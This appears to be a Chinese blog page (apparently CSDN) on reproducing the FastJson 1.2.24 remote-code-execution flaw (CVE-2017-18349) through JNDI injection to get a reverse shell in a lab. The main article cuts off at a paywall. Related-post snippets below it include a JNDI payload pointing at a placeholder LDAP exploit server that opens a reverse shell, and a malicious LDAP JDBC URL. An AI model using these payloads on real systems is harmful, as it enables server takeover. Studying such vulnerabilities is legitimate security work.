FastJson远程代码执行漏洞基于JNDI反弹shell使用

原创 已于 2022-10-13 15:45:40 修改 · 置顶 · 6.4k 阅读 · 7 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #web安全

于 2022-10-13 13:34:50 首次发布
本文介绍如何利用FastJson组件1.2.24及之前的版本存在的远程代码执行漏洞(CVE-2017-18349)进行反弹Shell攻击。通过JNDI注入方式,演示了设置反弹Shell命令、使用JNDI注入工具、构造恶意Payload以及最终成功获取目标主机Shell的过程。

目录

基础知识:

漏洞利用的两种方式:

靶场环境说明

反弹shell准备

反弹shell执行

在FastJson组件1.2.24及之前版本存在远程代码执行漏洞(CVE-2017-18349)。

基础知识:

Fastjson是阿里巴巴公司开发的一个Java语言编写的高性能的JSON处理器。它采用一种“假定有序快速匹配”的算法,号称是目前Java语言中最快的JSON库。Fastjson接口简单易用,已经被广泛使用在缓存序列化、协议交互、Web输出、Android客户端等多种应用场景。它提供两个主要接口toJSONString()和 parseObject()进行序列化和反序列化。

漏洞利用的两种方式:

基于Templateslmpl

基于JNDI

本文从JNDI的注入方式来实现反弹shell。

靶场环境说明

通过burpsuite可以抓到提交的报文:

 在Repeater处修改str的值可以进行注入验证

反弹sh

最低0.47元/天 解锁文章
fastjson 1.2.24/1.2.47漏洞复现
渗透之路,攻防之间皆学问
01-09 6710
当我们在渗透测试中,抓包的时候发现返回的流量内容存在json格式时,我们就可以想它是不是使用fastjson
Fastjson 远程命令执⾏漏洞
时光凉春衫薄的博客
01-06 2264
什么是 Fastjson Fastjson 是阿⾥开发的⼀款专门⽤于Java开发的包,可以⽅便的实现 json 对象与 JavaBean 对象的转换,JavaBean 对象与 json 字 符串的转换, json 对象与 json 字符串的转换。 API 使⽤ //序列化 String text = JSON.toJSONString(obj); //反序列化 VO vo = JSON.parse(); //解析为JSONObject类型或者JSONArray类型 VO vo = JSON.pars
Fastjson反序列化漏洞复现
m0_46371267的博客
09-29 1631
Fastjson反序列化漏洞复现
【网路安全---漏洞复现】Fastjson 1.2.24 命令执行漏洞复现-JNDI简单实现反弹shell(CVE-2017-18349)
m0_67844671的博客
09-27 2348
fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。即fastjson的主要功能就是将Java Bean序列化成JSON字符串,这样得到字符串之后就可以通过数据库等方式进行持久化了。看了很多别人关于漏洞复现过程,很多博客过程简洁,有的过程过于复杂,比如看到写java代码,用javac进行编译等等。所以我想写出比较详细的漏洞复现过程。
h2 database console JNDI RCE复现(反弹shell
最新发布
weixin_65582330的博客
09-19 1037
Setting Name: Generic JNDI Data Source (名称随意)Driver Class: javax.naming.InitialContext (JDK自带也不用考虑额外的驱动)JDBC URL: ldap://vps服务器ip:1389/f7p7w0 (恶意LDAP Server)由于是匿名的,User Name和Password均为空。
FastJson远程命令执行漏洞学习笔记
m0_73257876的博客
09-04 823
fastjson漏洞其实就是fastjson autotype在处理json对象的时候,未对@type字段进行完全的安全性验证,攻击者可以传入危险类,并调用危险类中连接远程主机,通过其中的恶意类执行代码。笔记只做学习记录分享。如有错误,请大家批评指正!
FastJson 漏洞复现
来日可期的博客
09-11 3444
FastJson 1.2.24 反序列化导致任意命令执行漏洞Fastjson 1.2.47 远程命令执行漏洞
fastjson远程命令执行
m0_52920608的博客
09-16 799
fastjson远程命令执行 vulhub复现
Fastjson 1.2.24 命令执行漏洞复现-JNDI简单实现反弹shell
03-08 3624
Fastjson 1.2.24 命令执行漏洞复现-JNDI简单实现反弹shell,不拖泥带水,最简单的办法实现反弹shell与命令执行。
Fastjson远程命令执行漏洞总结
weixin_42345596的博客
08-05 3779
一.FastJson 简介 fastjson.jar包原始下载地址:https://github.com/alibaba/fastjson fastjson用于将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。fastjson.jar是阿里开发的一款专门用于Java开发的包,可以方便的实现json对象与JavaBean对象的转换,实现JavaBean对象与json字符串的转换,实现json对象与json字符串的转换。除了这个fastjson以外,还有Google开
Fastjson远程代码执行(CNVD-2019-22238)漏洞复现
慢就是快
12-31 6287
文章目录0x00 漏洞简介0x02 影响版本0x03 漏洞复现0x03 指纹识别0x04 注意事项0x05 漏洞修复 0x00 漏洞简介 Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。 0x01 漏洞详情 Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象 Fastjson提供了autotype功能,允许用户在反序列化数据
fastjson1.2.69反序列化远程代码执行漏洞介绍.docx
07-01
fastjson1.2.69反序列化远程代码执行漏洞介绍fastjson采用黑白名单的方法来防御反序列化漏洞,导致当黑客不断发掘新的反序列化Gadgets类时,在autoType关闭的情况下仍然可能可以绕过黑白名单防御机制,造成远程命令执行漏洞。经研究,该漏洞利用门槛较低,可绕过autoType限制,风险影响较大。阿里云应急响应中心提醒fastjson用户尽快采取安全措施阻止漏洞攻击
复现-fastjson远程命令执行漏洞
luson2014的博客
12-12 4368
fastjson远程命令执行漏洞 fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。 Fastjson是一个Java库,可用于将Java对象转换为其JSON表示形式。它还可以用于将JSON字符串转换为等效的Java对象,fastjson爆出多个反序列化远程命令执行漏洞,攻击者可以通过此漏洞远程执行恶意代码来入侵服务器。
Fastjson1.2.47版本远程命令执行漏洞
来到了学渣的博客
07-20 3996
我的一个好朋友和我说,他在淘宝挖到fastjson命令执行,获得了一万奖金。我虽然是个学渣,也不太懂java,但起码以后碰到了,要知道这个玩意,并且要知道这个玩意如何挖掘。话不多说,开始复现之路。 环境 攻击机ip 192.168.10.144 漏洞环境ip 192.168.10.158 攻击的步骤: 1.Exploit.exp需要进行javac编译 2 所有用的工具和编译后的包要在同一目录,然后在该目录启动http服务和启动一个RMI服务器,监听9999端。其中RMI服务marshalsec
fastjson1.2.47远程代码执行&JNDI漏洞利用工具
归零者的博客
06-23 1246
Fastjson是一种Java库,用于处理JSON数据。它提供了一种简单高效的方式,用于将Java对象序列化为JSON,以及将JSON反序列化为Java对象。Fastjson以其高速和低内存消耗而闻名,因此在Java应用中广泛应用于JSON的序列化和反序列化。它支持各种功能,如JSON解析、序列化、反序列化以及对JSON数据的操作。Fastjson被广泛应用于Web应用、移动应用和其他基于Java的系统中,用于处理JSON数据。
Fastjson 1.2.47反序列化远程代码执行(CNVD-2019-22238)
Long___Xiao的博客
02-28 812
如果这些特定方法中存在可被恶意利用的逻辑(通常被称为“Gadget”),那么攻击者就可能利用这些逻辑执行恶意代码,从而导致严重的安全问题。fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。“dataSourceName”: “ldap://{JNDIExploit启动ldap服务的IP}:1389/Basic/ReverseShell/{开启nc服务的ip}/{nc端口}”,
fastjson 远程代码执行漏洞(HTTP_Java静态调用_java.lang.Runtime_远程代码执行)
Tastill的博客
08-21 1352
今天公司代码安全测试提出来一个问题:HTTP_Java静态调用_java.lang.Runtime_远程代码执行! 百度查询资料,发现是fastjson架包的安全漏洞问题,在com.alibaba.fastjson原来使用的是1.1.42版本的! 我升级到了1.2.30,测试发现确实解决了该问题! <dependency> <groupId>...
Fastjson远程代码执行漏洞(CNVD-2019-22238) 漏洞复现
Boom!脑洞大爆炸的博客
07-07 1577
Fastjson远程代码执行漏洞(CNVD-2019-22238) 漏洞复现
fastjson远程代码执行漏洞
网安君的博客
03-29 5950
Fastjson 1.2.24 远程代码执行漏洞 漏洞说明 FastJson库是Java的一个Json库,其作用是将Java对象转换成json数据来表示,也可以将json数据转换成Java对象。在2017年3月15日,fastjson官方主动爆出fastjson在1.2.24及之前版本存在远程代码执行高危安全漏洞。攻击者可以通过此漏洞远程执行恶意代码来入侵服务器。 前提条件 开启autotype 影响范围 fastjson 1.2.22-1.2.24 jdk 1.7,1.8版本 漏洞复现 由于Fastj
fastjson反弹shell
06-14
然而,由于其对反序列化功能的支持,Fastjson 在多个版本中存在严重的反序列化漏洞,攻击者可以通过构造恶意的 JSON 数据实现远程代码执行(RCE)。其中,Fastjson 1.2.24 版本及以下版本被爆出 CVE-2017-18349 漏洞...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值